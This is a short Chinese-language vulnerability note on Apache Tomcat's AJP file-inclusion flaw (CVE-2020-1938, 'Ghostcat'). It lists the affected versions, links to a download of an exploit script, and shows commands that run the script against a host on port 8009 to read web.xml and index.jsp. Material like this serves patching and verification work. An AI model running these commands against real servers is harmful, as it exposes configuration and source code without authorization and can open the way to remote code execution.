Apache Tomcat服务器存在文件包含漏洞(CVE-2020-1938)
详细描述
Apache Tomcat服务器存在文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件或源代码等。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。
### 漏洞受影响版本
Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31
脚本下载
GitHub地址:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
百度网盘:https://pan.baidu.com/s/1e_WkP-5iPDZa2mcWVGImTw 提取码:mm92
运行环境
python2.7.12
漏洞验证
### 成功读取的是apache-tomcat-8.5.50/webapps/ROOT/WEB-INF/web.xml文件
python CNVD-2020-10487-Tomcat-Ajp-lfi.py 10.xx.xx.xx -p 8009 -f WEB-INF/web.xml
image.png
### 成功读取的是ROOT目录下的index.jsp文件内容
python CNVD-2020-10487-Tomcat-Ajp-lfi.py 10.xx.xx.xx -p 8009 -f index.jsp
image.png
可读取webapp 目录下的任意文件。
网友评论